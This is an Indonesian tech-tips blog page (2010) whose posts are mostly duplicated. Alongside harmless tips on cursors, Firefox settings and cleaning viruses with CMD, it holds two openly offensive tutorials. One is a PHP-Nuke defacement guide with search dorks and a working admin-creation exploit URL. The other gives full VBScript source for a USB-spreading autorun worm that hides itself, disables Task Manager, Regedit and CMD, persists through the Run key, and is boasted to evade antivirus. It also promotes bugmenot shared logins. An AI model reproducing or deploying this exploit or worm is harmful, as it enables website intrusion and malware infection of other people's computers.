Postingan
Kali ini Shy_SkaTeL akan memberikan cara untuk mengatasi masalah virus yang sering kita jumpai di komputer kita.
Shy akan memberikan cara mengatasi virus dengan CMD, yang dapat dikatakan mudah dalam melakukannya, caranya kita harus menguasai perintah-perintah dalam cmd, untuk itulah diperlukan pembelajaran yang baik.
Langkah pertama untuk mengidentifikasi virus adalah
periksa semua drive, my documents, folder windows dan system32.
Caranya adalah dengan mengetikkan "dir/ah" pada tempat yang dituju, setelah melihat file dan folder-folder yang di hidden, lihatlah file dan folder yang anda curigai sebagai virus, lalu bila anda menemukan file yang dicurigai, hilangkan attribut hidden, system dan read only agar mudah di hapus dengan cara mengetikkan "attrib -h -s -r /s /d". Maka semua file dan folder yang di hidden akan nampak, untuk memastikan file tersebut adalah virus, anda bisa melakukannya dengan cara klik properties pada file yang dituju, lihat data yang ada, apakah mencurigakan atau tidak. Bila memang mencurigakan anda dapat men-deetenya dengan cara Menekan tombol "shift+delete" ini dilakukan agar virus tersebut tidak bersarang di recycle bin.
Tapi menghapus virusnya tidaklah mengatasi masalah bilas ada file induk yang membuatnya lagi, untuk itu kita perlu belajar cara mencari file induk dan mendeletenya.
Kita dapat mencari file induk dengan cara menganalisa file virus yang di buatnya, caranya adalah dengan mengetikkan "type [nama file]", maka CMD akan memberikan Script dari virus tersebut, lalu bagaimana cara mencari file induk??, anda bisa mencarinya dengan melihat Script yang menunjukkan tempat file induk tersebut, biasanya bersarang di folder system dan windows, jadi carilah kata yang menunjukkan suatu file/tempat file, lalu periksalah tempat tersebut dan apabial ditemukan file yang dimaksud, segeralah anda mendeletenya dengan meng-unhidden dan menekan shift+delete, namun biasanya file induk sulit di delete karena dibuat sebagai file system yang selalu berjalan dengan autorun, cara menghapusnya adalah dengan menghilangkan semua attribut dari file tersebut "attrib -h -a -s -r [nama file.ekstensi], namun sebelumnya bukalah taskmanager, lalu lihatlah program yang mencurigakan, lalu terminate, atau bila tak ditemukan, anda bisa mendelete file yang Undeleted dengan mematikan explorer.exe untuk sementara.
Saya jelaskan lagi cara kerja virus, virus umumnya sebuah file yang dapat "berkembang biak" atau menggandakan diri dan membuat file induk, dimana mereka saling terkait dan membantu satu sama lain, contoh: ketika anda mendele virusnya saja maka induk akan membuat nya lagi setelah beberapa menit, dan bila file inuk di delete maka file virus akan membuat kembali file induknya. Bagaimana cara mendeletenya? kita harus mendeletenya sekaligus, tapi bagaimana? disinilah gunanya belajar command prompt, sebelum anda mematikan program virus dan explorer.exe, buatlah sebuah text document, lalu ketikkan
@echo off
cd [tempat virus]
attrib -h -a -s -r /s /d
delete [file virus]
cd [tempat virus2]
attrib -h -a -s -r /s /d
delete [file virus2]
'sampai semua virus...... lalu
cd [tempat file induk]
attrib -h -a -s -r /s /d
delete [file induk]
echo success!!!!
pause
lalu save as dengan format "all files" lalu berinama "Antivirus.bat" save file di desktop
mulai mematikan virus:
aktifkan cmd dan pastikan tempatnya di desktop
Matikan program virus, matikan explorer.exe[bila perlu] (biarkan task manager terbuka)
di Cmd ketikkan "antivirus.bat" lalu enter....
tunggu proses yang berjalan.....
setelah selesai
jalankan kembali explorer.exe di menu file
dan
Pastikan virus anda hilang....
Catatan: "Ada virus yang tidak dapat dihapus dengan cara ini, yaitu virus yang cukup advanced, untuk itu bila anda tidak dapat menghapusnya, maka jalankan program yang mematikan program virus melalui registry di menu "run" pada HKCU dan HKLM, walaupun tidak menghapus virus, namun dapat memfreeze virus agar tidak bekerja"
dari : http://skatel-1chezone.blogspot.com/2009/04/belajar-command-prompt-2.html
Sabtu, 16 Oktober 2010
Kamis, 14 Oktober 2010
MENGGANTI CURSOR COMPUTER
langsung aja download macam" cursor nya
disini
extrak file nya dan copy paste icon cursor nya ke C:\WINDOWS\Cursors
lalu bukak mouse nya dan pilih browser dan pilih icon nya
disini
extrak file nya dan copy paste icon cursor nya ke C:\WINDOWS\Cursors
lalu bukak mouse nya dan pilih browser dan pilih icon nya
Rabu, 13 Oktober 2010
Cara mudah Login di Forum tanpa Registrasi
Pernah gaa saat googling buat cari informasi penting ehh tiba2 ketemu di forum yang belum kita tahu dan ternyata harus daftar dulu atau login biar bisa lihat informasinya?
pasti terasa sangat malas kalau daftar lagi,
betull gaaa ??
tenang aja barusan tadi saya juga merasakan itu kog, sebelum posting artikel ini tadi saya iseng2 cari ebook bertema sulap di indowebster ehhh malah ada tulisan di salah satu keterangannya 'pass di forum'.
wahh nanti kalau saya download percuma dong nanti saya ga bisa buka filenya.
terus menurut feeling saya wahh pasti ini pass ada di forum Indowebster (IDWS) kalau akun idws saya punya tapi kalau forumnya saya nggaa punyaa. hehehe
jadi berfikir balik nii,
mauu download apa gaa yaa?
tiba2 saya ingat salah satu trik yang saya dapat dari forum biasanya ini niii http://xcode.or.id/forum2
forum kebanggaan indonesia kaskus.us juga lohhh hehehhe
okee deh dari pada cerita terus
begini caranya untuk dapat akun login.
silahkan akang2 mba2 masuk disini http://bugmenot.com
caranya:
silahkan masukan nama link forum di kotak input link disana
lihat gambar
gantikan www.example.com dengan link forum yang ingin dituju.
jika sudah tekan get logins.
lihat apa hasilnyaa ???
selamat mencobaa...
pasti terasa sangat malas kalau daftar lagi,
betull gaaa ??
tenang aja barusan tadi saya juga merasakan itu kog, sebelum posting artikel ini tadi saya iseng2 cari ebook bertema sulap di indowebster ehhh malah ada tulisan di salah satu keterangannya 'pass di forum'.
wahh nanti kalau saya download percuma dong nanti saya ga bisa buka filenya.
terus menurut feeling saya wahh pasti ini pass ada di forum Indowebster (IDWS) kalau akun idws saya punya tapi kalau forumnya saya nggaa punyaa. hehehe
jadi berfikir balik nii,
mauu download apa gaa yaa?
tiba2 saya ingat salah satu trik yang saya dapat dari forum biasanya ini niii http://xcode.or.id/forum2
forum kebanggaan indonesia kaskus.us juga lohhh hehehhe
okee deh dari pada cerita terus
begini caranya untuk dapat akun login.
silahkan akang2 mba2 masuk disini http://bugmenot.com
caranya:
silahkan masukan nama link forum di kotak input link disana
lihat gambar
jika sudah tekan get logins.
lihat apa hasilnyaa ???
selamat mencobaa...
Cara mudah Melacak Nomor HP dan Kode Area
yang mau melacak nomor spam yang sering nyangkut di HP ??ini dia solusinya hehehehehe
kadang tiba2 ada sms masuk yang ga penting banget dan ga tahu siapa itu yang ngirim.
kemarin hari teman saya sempat kena tipu dari pengirim sms penipuan yang berkedok hadiah 75juta, secara siapa yang ga tertarik? betull ngga?
tidak lama kemudian teman saya datang dan bilang.
ehhhh, gw dapat 75juta dari operator ini (maaf ga perlu disebut).
langsung saya lihat nomornya dan
memang ternyata hanya penipuan.
saya telpon orangnya, dng lemah lembut dari kata-katanya sampai saya ga kerasa kena hipnotis hehehehehe
langsung dehh ingat2
salah satu tool dari Family_code (xcode)
silahkan download dibawah ini.
disini
Selasa, 12 Oktober 2010
Print Thread Print Thread Teknik Deface dengan bug yang sudah lama
Bingung pada mua belajar deface ? dan susah di mengerti tutor'a ?
Oke dey gw bakal ngajarin Bugs deface yang udah lama banget buat kalian.
Salah satu teknik daface sederhana yang sdh lawas & cucok banget buat newbie² buat belajar..
Dengan menggunakan bug seperti :
www.target.com/nuke/admin.php?op=AddAuthor&add_aid=Newbie&add_name=nwb&add_pwd=newbiejelek&add_email=newbie@dodol.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
kamu dapat membuat text sederhana pada halaman depan site seperti :
Defaced by Newbie
Greetz to everyone at #yogyacarderlink
Hey admin.. find your hole and close it.
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Langkah awal buka om google ketik :
allinurl:.com/nuke /index.php atau allinurl:.org/nuke/index.php
Nah ..... kalo sudah ketemu site targetnya maka langkah selanjutnya adalah :
1. www.target.com/nuke/index.php
2. www.target.com/nuke/admin.php => index.php yg diatas tadi dirubah
menjadi admin.php
3. Masukkan bug nya di belakang site target misal :
www.target.com/nuke/admin.php?op=AddAuthor&add_aid=Newbie&add_name=nwb&add_pwd=newbiejelek&add_email=newbie@dodol.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
Kalo nggak mau berarti site tsb udah di path ama admin nya.
Tapi kalo berhasil, maka di url/browsing kamu akan muncul :
www.target.com/nuke/admin.php?op=mod_author
5. Disana kamu di suruh login, masukin id & password kamu tadi. Masih ingat kan ???
id=Newbie => liat yg diatas tadi
password=newbiejelek => liat yg diatas tadi
Nah . . . kamu sekarang sudah masuk ke "Administration Menu" site tsb. Berarti kamu sudah menguasai site tsb sekarang ! He.. he.. he..
Sekarang kamu pilih gambar Handphone (dibawahnya ada tulisan Messages), lalu input :
title =>
content =>
Hey admin.......find your hole and close it..
Greetz to everyone at #yogyacarderlink
expiration => unlimited trus klik tab add messages yg ada dibawah
Kalo sudah, buka url/browsing baru lalu ketikkan site target tadi, misal : www.target.com/nuke atau www.target.com/nuke/index.php
kalo nggak ada hasil deface kamu coba klik tab refresh yg ada diatas yg disamping url/browsing lo.
Oke dey gw bakal ngajarin Bugs deface yang udah lama banget buat kalian.
Salah satu teknik daface sederhana yang sdh lawas & cucok banget buat newbie² buat belajar..
Dengan menggunakan bug seperti :
www.target.com/nuke/admin.php?op=AddAuthor&add_aid=Newbie&add_name=nwb&add_pwd=newbiejelek&add_email=newbie@dodol.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
kamu dapat membuat text sederhana pada halaman depan site seperti :
Defaced by Newbie
Greetz to everyone at #yogyacarderlink
Hey admin.. find your hole and close it.
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Langkah awal buka om google ketik :
allinurl:.com/nuke /index.php atau allinurl:.org/nuke/index.php
Nah ..... kalo sudah ketemu site targetnya maka langkah selanjutnya adalah :
1. www.target.com/nuke/index.php
2. www.target.com/nuke/admin.php => index.php yg diatas tadi dirubah
menjadi admin.php
3. Masukkan bug nya di belakang site target misal :
www.target.com/nuke/admin.php?op=AddAuthor&add_aid=Newbie&add_name=nwb&add_pwd=newbiejelek&add_email=newbie@dodol.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
Kalo nggak mau berarti site tsb udah di path ama admin nya.
Tapi kalo berhasil, maka di url/browsing kamu akan muncul :
www.target.com/nuke/admin.php?op=mod_author
5. Disana kamu di suruh login, masukin id & password kamu tadi. Masih ingat kan ???
id=Newbie => liat yg diatas tadi
password=newbiejelek => liat yg diatas tadi
Nah . . . kamu sekarang sudah masuk ke "Administration Menu" site tsb. Berarti kamu sudah menguasai site tsb sekarang ! He.. he.. he..
Sekarang kamu pilih gambar Handphone (dibawahnya ada tulisan Messages), lalu input :
title =>
content =>
Hey admin.......find your hole and close it..
Greetz to everyone at #yogyacarderlink
expiration => unlimited trus klik tab add messages yg ada dibawah
Kalo sudah, buka url/browsing baru lalu ketikkan site target tadi, misal : www.target.com/nuke atau www.target.com/nuke/index.php
kalo nggak ada hasil deface kamu coba klik tab refresh yg ada diatas yg disamping url/browsing lo.
Membuat Virus Sederhana – Notepad
Iseng-iseng mencolok Flash Disc saudara saya tiba-tiba saya nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host.
Sesua janji saya, kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama “Kalong.VBS”. Sekarang buka Notepad-nya. Copy kode berikut :
‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next
‘//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd
‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket
for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
‘//–Manipulasi Registry–//
set kalong = createobject(”WScript.Shell”)
‘//–Manip – Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “
‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”
‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
‘//–Manip – Disable klik kanan–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
‘//–Manip – Munculkan Pesan Setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”
‘//–Manip – Aktif setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “
‘//–Manip – Ubah RegisteredOwner dan Organization–//
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”
‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode
Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.
He..he…Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay. Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.
Sesua janji saya, kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama “Kalong.VBS”. Sekarang buka Notepad-nya. Copy kode berikut :
‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next
‘//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd
‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket
for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
‘//–Manipulasi Registry–//
set kalong = createobject(”WScript.Shell”)
‘//–Manip – Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “
‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”
‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
‘//–Manip – Disable klik kanan–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
‘//–Manip – Munculkan Pesan Setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”
‘//–Manip – Aktif setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “
‘//–Manip – Ubah RegisteredOwner dan Organization–//
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”
‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode
Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.
He..he…Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay. Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.
kode pelengkap virus
Dim regkey
Set regkey = CreateObject("Wscript.Shell")
regkey.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD"
regkey.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckValue", 0
regkey.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden", 0
regkey.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableTaskMgr", 1, "REG_DWORD"
regkey.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1, "REG_DWORD"
regkey.regwrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\disableCMD", 2, "REG_DWORD"
regkey.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoFolderOptions", 1, "REG_DWORD"
Set regkey = CreateObject("Wscript.Shell")
regkey.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD"
regkey.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckValue", 0
regkey.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden", 0
regkey.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableTaskMgr", 1, "REG_DWORD"
regkey.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1, "REG_DWORD"
regkey.regwrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\disableCMD", 2, "REG_DWORD"
regkey.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoFolderOptions", 1, "REG_DWORD"
Cara Membuat Sofware Berbicara
Cara membuatnya gampang, pertama buka Notepad
Kemudian Copy Paste Script berikut :
Dim msg, sapi
msg = InputBox ( "Apa yang Anda ingin saya katakan?", "Masukan kata-kata")
Set sapi = CreateObject ( "sapi.spvoice")
sapi.Speak msg
Save As… kemudian pilih All Files lalu beri nama mypc.vbs
Kemudian Copy Paste Script berikut :
Dim msg, sapi
msg = InputBox ( "Apa yang Anda ingin saya katakan?", "Masukan kata-kata")
Set sapi = CreateObject ( "sapi.spvoice")
sapi.Speak msg
Save As… kemudian pilih All Files lalu beri nama mypc.vbs
Koneksi Cepat... Download Lambat......!!!
Mozilla Firefox.. adalah salah satu browser yang paling siiipp. Kalau menurut saya Mozilla firefox adalah salah satu mesin browser yang sangat lengkap fiturnya. Nah.. saya akan memberikan sedikit trik mengenai cara mempercepat Firefox anda dalam brosing di internet dengan sedikit tweaking.. Smile
1. Untuk mempercepat browsing :
1. Ctrl+Enter, ini untuk membuka domain yang menggunakan .com. caranya adalah ketikkan nama domain kemudian klik ctrl+enter. contohnya, anda ingin membuka “www.yahoo.com” jadi ketiklah “yahoo” kemudian klik ctrl+enter
2. Shift+Enter, ini untuk membuka domain yang menggunakan .net. caranya adalah ketikkan nama domain kemudian klik ctrl+enter. contohnya, anda ingin membuka “www.telkom.net” jadi ketiklah “telkom” kemudian klik shif+enter
3. Ctrl+Shift+Enter, ini untuk membuka domain yang menggunakan .org. caranya adalah ketikkan nama domain kemudian klik ctrl+enter. contohnya, anda ingin membuka “www.dikti.org” jadi ketiklah “dikti” kemudian klik Ctrl+Shift+Enter
2. Tweeking Firefox :
1. Ketik “about:config” di firefox anda kemudian enter
2. Maka akan keluar sebuah settingan untuk tweaking firefox
3. Untuk merubahnya, klik 2 kali dan masukkan data perubahannya
4. Jika data dibawah tidak terdapat dalam settingan default firefox, klik kanan pilih New. Untuk data berupa angka, pilih Integer, untuk true/false pilih Boolean.
- Untuk pengguna DSL :
1. Set “network.http.pipelining : true”
2. Set “network.http.proxy.pipelining : true”
3. Set “network.http.pipelining.maxrequests : 64?
4. Set “nglayout.initialpaint.delay : 0?
- Untuk pengguna ADSL :
1. Set “network.http.max-connections : 64?
2. Set “network.http.max-connections-per-server : 21?
3. Set “network.http.max-persistent-connections-per-server : 8?
4. Set “network.http.pipelining : true”
5. Set “network.http.pipelining.maxrequests : 100?
6. Set “network.http.proxy.pipelining : true”
7. Set “nglayout.initialpaint.delay : 0?
- Untuk pengguna Dial Up
1. Set “browser.cache.disk_cache_ssl : true”
2. Set “browser.xul.error_pages.enabled : true”
3. Set “network.http.max-connections : 32?
4. Set “network.http.max-connections-per-server : 8?
5. Set “network.http.max-persistent-connections-per-proxy : 8?
6. Set “network.http.max-persistent-connections-per-server : 4?
7. Set “network.http.pipelining : true”
8. Set “network.http.pipelining.maxrequests : 8?
9. Set “network.http.proxy.pipelining : true”
10. Set “plugin.expose_full_path : true”
11. Set “signed.applets.codebase_principal_support : true”
12. Set “content.interrupt.parsing : true”
13. Set “content.max.tokenizing.time : 3000000?
14. Set “content.maxtextrun : 8191?
15. Set “content.notify.backoffcount : 5?
16. Set “content.notify.interval : 750000?
17. Set “content.notify.ontimer : true”
18. Set “content.switch.threshold : 750000?
Langkah - langkahnya
1. Pada address bar ketik about:config
maka akan muncul file confugurasi fire fox
2 cari file berikut :
network.http.pipelining
network.http.proxy.pipelining
network.http.pipelining.maxrequests
3. set file tersebut seperti berikut :
network.http.pipelining menjadi true
network.http.proxy.pipelining menjadi true
4. Ubah nilai file berikut :
network.http.pipelining.maxrequests menjadi 50 atau 64.
5. buat file berikut :
klik kanak Trus pilih new : integer. copy paste perintah ini : nglayout.initialpaint.delay beri nilai 0 (nol)
Selamat Mencoba.... o....ya... kalau bisa downloadnya pake' progam IDM ma Orbit...!
1. Untuk mempercepat browsing :
1. Ctrl+Enter, ini untuk membuka domain yang menggunakan .com. caranya adalah ketikkan nama domain kemudian klik ctrl+enter. contohnya, anda ingin membuka “www.yahoo.com” jadi ketiklah “yahoo” kemudian klik ctrl+enter
2. Shift+Enter, ini untuk membuka domain yang menggunakan .net. caranya adalah ketikkan nama domain kemudian klik ctrl+enter. contohnya, anda ingin membuka “www.telkom.net” jadi ketiklah “telkom” kemudian klik shif+enter
3. Ctrl+Shift+Enter, ini untuk membuka domain yang menggunakan .org. caranya adalah ketikkan nama domain kemudian klik ctrl+enter. contohnya, anda ingin membuka “www.dikti.org” jadi ketiklah “dikti” kemudian klik Ctrl+Shift+Enter
2. Tweeking Firefox :
1. Ketik “about:config” di firefox anda kemudian enter
2. Maka akan keluar sebuah settingan untuk tweaking firefox
3. Untuk merubahnya, klik 2 kali dan masukkan data perubahannya
4. Jika data dibawah tidak terdapat dalam settingan default firefox, klik kanan pilih New. Untuk data berupa angka, pilih Integer, untuk true/false pilih Boolean.
